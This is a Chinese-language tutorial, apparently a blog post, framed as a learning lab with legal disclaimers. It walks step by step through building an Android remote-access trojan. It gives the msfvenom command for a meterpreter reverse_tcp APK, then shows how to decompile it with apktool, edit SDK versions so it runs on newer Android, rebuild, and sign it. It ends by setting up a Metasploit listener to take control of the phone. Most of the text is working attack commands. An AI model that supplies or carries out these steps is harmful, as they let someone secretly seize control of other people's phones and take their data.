免责声明:
本实验仅供学习参考,禁止用于非法用途! 如用于非法行为,后果自行负责!
试验材料准备
kali linux,下载地址:www.kali.org/
apktools,下载地址:apktool.org/
java,java环境的配置请自行寻找教程
一、制作木马程序
第一步、生成木马:
使用msf工具生成木马,命令如下:
msfvenom -p android/meterpreter/reverse_tcp LHOST=[此处为kali的ip] LPORT=[此处为监听端口号] R > [此处为路径与木马程序名称].apk
第二步、加工木马:
-
在物理机中创建一个非中文命名的文件,并将kali中生成的木马文件与之前下载的apktools转入此文件夹中
-
在此目录下启动命令行并输入如下指令:
java -jar apktool_2.9.3.jar d -f [木马名称].apk -o [程序解包后的文件夹名称]
-
打开解包生成的文件夹,找到并以记事本或vscode打开名为
apktools.yml
的文件,按下图所示修改:将红框内的参数;10改成16。17改成23。完成后保存退出
-
重新打包木马程序,命令如下:
java -jar apktool_2.9.3.jar b [之前解包后生成的文件夹名称] -o [新的程序名].apk
- 使用java自带的标准库keytool生成签名证书,命令如下:
keytool -genkeypair -alias sss -keyalg RSA -validity 100 -keystore sss.jks
口令随便写
身份信息同样
出现如下图:
摁y,然后回车
完成后可以看到文件夹中生成了名为sss.jks
的证书:
- 对刚才重新打包的程序进行签名,命令如下:
jarsigner -verbose -keystore sss.jks -signedjar [签名后的程序名称].apk [未签名的程序名称].apk sss
回车后输入之前设置的口令,就可以得到签名后的程序
至此木马程序制作完成
二、开始测试
-
在kali中启动msf攻击平台
-
配置监听,指令如下:
use exploit/multi/handler //启用监听模块
set payload android/meterpreter/reverse_tcp //设置payload
set LHOST [kali的ip]
set LPORT [端口号]
options
指令检查,配置好后输入run
指令开始监听
- 将在物理机中制作好的木马程序导入手机并安装运行
此时kali中开始接收木马开始工作
- 输入
sysinfo
指令,可得到手机的系统信息
本实验只使用
sysinfo
指令,其他指令请自行实验
- 实验到此完成。完成本实验后请立刻清除电脑与手机中制作的木马程序,禁止传播流出!
再次声明:
本实验仅供学习参考,禁止用于非法用途!如用于非法行为,后果自行负责!
总结
本实验可在虚拟机中安装安卓系统进行操作,或可直接安装任意一家的安卓模拟器进行。
注:如对实体手机进行测试需要将kali的网络连接模式切换为网桥模式,使用虚拟机可以用nat模式,总之需要将目标安卓系统与kali系统保持在同一网段下
msf工具生成的木马可以直接进行测试,但只适用于安卓老版本。新版本安卓系统则需要本实验中的方法进行二次制作